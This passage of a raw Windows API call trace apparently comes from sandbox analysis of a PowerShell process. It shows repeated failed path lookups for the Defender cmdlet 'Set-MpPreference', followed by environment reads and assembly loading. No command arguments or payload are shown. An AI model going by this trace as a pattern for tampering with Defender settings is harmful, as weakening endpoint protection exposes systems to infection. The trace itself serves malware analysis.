lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.039] GetLastError () returned 0x2 [0150.039] SetErrorMode (uMode=0x1) returned 0x1 [0150.040] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.040] GetLastError () returned 0x2 [0150.040] SetErrorMode (uMode=0x1) returned 0x1 [0150.040] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.JSE", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.040] GetLastError () returned 0x2 [0150.040] SetErrorMode (uMode=0x1) returned 0x1 [0150.040] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.040] GetLastError () returned 0x2 [0150.040] SetErrorMode (uMode=0x1) returned 0x1 [0150.040] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.WSF", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.040] GetLastError () returned 0x2 [0150.040] SetErrorMode (uMode=0x1) returned 0x1 [0150.040] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.040] GetLastError () returned 0x2 [0150.040] SetErrorMode (uMode=0x1) returned 0x1 [0150.040] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.WSH", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.041] GetLastError () returned 0x2 [0150.041] SetErrorMode (uMode=0x1) returned 0x1 [0150.041] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.041] GetLastError () returned 0x2 [0150.041] SetErrorMode (uMode=0x1) returned 0x1 [0150.041] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.MSC", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.041] GetLastError () returned 0x2 [0150.041] SetErrorMode (uMode=0x1) returned 0x1 [0150.041] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0150.041] GetLastError () returned 0x2 [0150.041] SetErrorMode (uMode=0x1) returned 0x1 [0150.041] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.041] GetLastError () returned 0x2 [0150.041] SetErrorMode (uMode=0x1) returned 0x1 [0150.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.041] GetLastError () returned 0x2 [0150.041] SetErrorMode (uMode=0x1) returned 0x1 [0150.042] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.ps1", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.044] GetLastError () returned 0x2 [0150.044] SetErrorMode (uMode=0x1) returned 0x1 [0150.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.044] GetLastError () returned 0x2 [0150.045] SetErrorMode (uMode=0x1) returned 0x1 [0150.045] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.psm1", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.046] GetLastError () returned 0x2 [0150.046] SetErrorMode (uMode=0x1) returned 0x1 [0150.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.046] GetLastError () returned 0x2 [0150.046] SetErrorMode (uMode=0x1) returned 0x1 [0150.046] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.psd1", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.047] GetLastError () returned 0x2 [0150.047] SetErrorMode (uMode=0x1) returned 0x1 [0150.047] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.047] GetLastError () returned 0x2 [0150.047] SetErrorMode (uMode=0x1) returned 0x1 [0150.047] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.COM", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.049] GetLastError () returned 0x2 [0150.049] SetErrorMode (uMode=0x1) returned 0x1 [0150.049] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.049] GetLastError () returned 0x2 [0150.049] SetErrorMode (uMode=0x1) returned 0x1 [0150.049] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.EXE", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.050] GetLastError () returned 0x2 [0150.050] SetErrorMode (uMode=0x1) returned 0x1 [0150.050] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.050] GetLastError () returned 0x2 [0150.050] SetErrorMode (uMode=0x1) returned 0x1 [0150.051] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.BAT", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.052] GetLastError () returned 0x2 [0150.052] SetErrorMode (uMode=0x1) returned 0x1 [0150.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.052] GetLastError () returned 0x2 [0150.052] SetErrorMode (uMode=0x1) returned 0x1 [0150.052] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.CMD", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.053] GetLastError () returned 0x2 [0150.053] SetErrorMode (uMode=0x1) returned 0x1 [0150.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.053] GetLastError () returned 0x2 [0150.053] SetErrorMode (uMode=0x1) returned 0x1 [0150.053] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.VBS", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.055] GetLastError () returned 0x2 [0150.055] SetErrorMode (uMode=0x1) returned 0x1 [0150.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.055] GetLastError () returned 0x2 [0150.055] SetErrorMode (uMode=0x1) returned 0x1 [0150.055] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.VBE", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.056] GetLastError () returned 0x2 [0150.056] SetErrorMode (uMode=0x1) returned 0x1 [0150.056] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.056] GetLastError () returned 0x2 [0150.056] SetErrorMode (uMode=0x1) returned 0x1 [0150.056] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.JS", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.057] GetLastError () returned 0x2 [0150.057] SetErrorMode (uMode=0x1) returned 0x1 [0150.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.057] GetLastError () returned 0x2 [0150.057] SetErrorMode (uMode=0x1) returned 0x1 [0150.057] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.JSE", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.059] GetLastError () returned 0x2 [0150.059] SetErrorMode (uMode=0x1) returned 0x1 [0150.059] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.059] GetLastError () returned 0x2 [0150.059] SetErrorMode (uMode=0x1) returned 0x1 [0150.059] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.WSF", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.060] GetLastError () returned 0x2 [0150.060] SetErrorMode (uMode=0x1) returned 0x1 [0150.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.060] GetLastError () returned 0x2 [0150.060] SetErrorMode (uMode=0x1) returned 0x1 [0150.060] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.WSH", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.062] GetLastError () returned 0x2 [0150.062] SetErrorMode (uMode=0x1) returned 0x1 [0150.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.062] GetLastError () returned 0x2 [0150.062] SetErrorMode (uMode=0x1) returned 0x1 [0150.062] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.MSC", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.063] GetLastError () returned 0x2 [0150.063] SetErrorMode (uMode=0x1) returned 0x1 [0150.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0150.063] GetLastError () returned 0x2 [0150.063] SetErrorMode (uMode=0x1) returned 0x1 [0150.064] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.065] GetLastError () returned 0x2 [0150.065] SetErrorMode (uMode=0x1) returned 0x1 [0150.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.065] GetLastError () returned 0x2 [0150.065] SetErrorMode (uMode=0x1) returned 0x1 [0150.065] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.ps1", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.065] GetLastError () returned 0x2 [0150.065] SetErrorMode (uMode=0x1) returned 0x1 [0150.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.065] GetLastError () returned 0x2 [0150.065] SetErrorMode (uMode=0x1) returned 0x1 [0150.065] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.psm1", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.065] GetLastError () returned 0x2 [0150.065] SetErrorMode (uMode=0x1) returned 0x1 [0150.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.066] GetLastError () returned 0x2 [0150.066] SetErrorMode (uMode=0x1) returned 0x1 [0150.066] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.psd1", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.066] GetLastError () returned 0x2 [0150.066] SetErrorMode (uMode=0x1) returned 0x1 [0150.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.066] GetLastError () returned 0x2 [0150.066] SetErrorMode (uMode=0x1) returned 0x1 [0150.066] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.COM", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.066] GetLastError () returned 0x2 [0150.066] SetErrorMode (uMode=0x1) returned 0x1 [0150.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.066] GetLastError () returned 0x2 [0150.066] SetErrorMode (uMode=0x1) returned 0x1 [0150.066] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.EXE", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.067] GetLastError () returned 0x2 [0150.067] SetErrorMode (uMode=0x1) returned 0x1 [0150.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.067] GetLastError () returned 0x2 [0150.067] SetErrorMode (uMode=0x1) returned 0x1 [0150.067] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.BAT", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.067] GetLastError () returned 0x2 [0150.067] SetErrorMode (uMode=0x1) returned 0x1 [0150.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.067] GetLastError () returned 0x2 [0150.067] SetErrorMode (uMode=0x1) returned 0x1 [0150.067] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.CMD", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.067] GetLastError () returned 0x2 [0150.067] SetErrorMode (uMode=0x1) returned 0x1 [0150.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.067] GetLastError () returned 0x2 [0150.067] SetErrorMode (uMode=0x1) returned 0x1 [0150.068] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.VBS", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.068] GetLastError () returned 0x2 [0150.068] SetErrorMode (uMode=0x1) returned 0x1 [0150.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.068] GetLastError () returned 0x2 [0150.068] SetErrorMode (uMode=0x1) returned 0x1 [0150.068] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.VBE", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.068] GetLastError () returned 0x2 [0150.068] SetErrorMode (uMode=0x1) returned 0x1 [0150.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.068] GetLastError () returned 0x2 [0150.068] SetErrorMode (uMode=0x1) returned 0x1 [0150.068] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.JS", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.068] GetLastError () returned 0x2 [0150.068] SetErrorMode (uMode=0x1) returned 0x1 [0150.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.068] GetLastError () returned 0x2 [0150.068] SetErrorMode (uMode=0x1) returned 0x1 [0150.069] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.JSE", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.069] GetLastError () returned 0x2 [0150.069] SetErrorMode (uMode=0x1) returned 0x1 [0150.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.069] GetLastError () returned 0x2 [0150.069] SetErrorMode (uMode=0x1) returned 0x1 [0150.069] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.WSF", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.069] GetLastError () returned 0x2 [0150.069] SetErrorMode (uMode=0x1) returned 0x1 [0150.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.069] GetLastError () returned 0x2 [0150.069] SetErrorMode (uMode=0x1) returned 0x1 [0150.069] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.WSH", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.069] GetLastError () returned 0x2 [0150.069] SetErrorMode (uMode=0x1) returned 0x1 [0150.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.070] GetLastError () returned 0x2 [0150.070] SetErrorMode (uMode=0x1) returned 0x1 [0150.070] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.MSC", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.070] GetLastError () returned 0x2 [0150.070] SetErrorMode (uMode=0x1) returned 0x1 [0150.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5d8e830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0150.070] GetLastError () returned 0x2 [0150.070] SetErrorMode (uMode=0x1) returned 0x1 [0150.070] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference", lpFindFileData=0x449110 | out: lpFindFileData=0x449110) returned 0xffffffff [0150.070] GetLastError () returned 0x2 [0150.070] SetErrorMode (uMode=0x1) returned 0x1 [0150.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.092] GetLastError () returned 0xcb [0150.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5d8e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.093] GetLastError () returned 0x2 [0150.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5d8e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.093] GetLastError () returned 0x2 [0150.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5d8e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.093] GetLastError () returned 0x2 [0150.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5d8e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0150.094] GetLastError () returned 0x2 [0150.369] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.369] GetLastError () returned 0xcb [0150.896] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.896] GetLastError () returned 0xcb [0150.900] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.900] GetLastError () returned 0xcb [0150.960] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.961] GetLastError () returned 0xcb [0150.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.965] GetLastError () returned 0xcb [0150.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.966] GetLastError () returned 0xcb [0151.028] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.028] GetLastError () returned 0xcb [0151.141] VirtualQuery (in: lpAddress=0x5d8d8bc, lpBuffer=0x5d8e8bc, dwLength=0x1c | out: lpBuffer=0x5d8e8bc*(BaseAddress=0x5d8d000, AllocationBase=0x5400000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x448558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.223] GetLastError () returned 0xcb [0151.404] VirtualQuery (in: lpAddress=0x5d8d8bc, lpBuffer=0x5d8e8bc, dwLength=0x1c | out: lpBuffer=0x5d8e8bc*(BaseAddress=0x5d8d000, AllocationBase=0x5400000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5d8def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.424] GetLastError () returned 0xcb [0151.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5d8dea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.424] GetLastError () returned 0xcb [0151.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5d8dea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.424] GetLastError () returned 0xcb [0151.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5d8dea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.424] GetLastError () returned 0xcb [0151.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5d8def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.526] GetLastError () returned 0xcb [0151.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x5d8dea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0151.526] 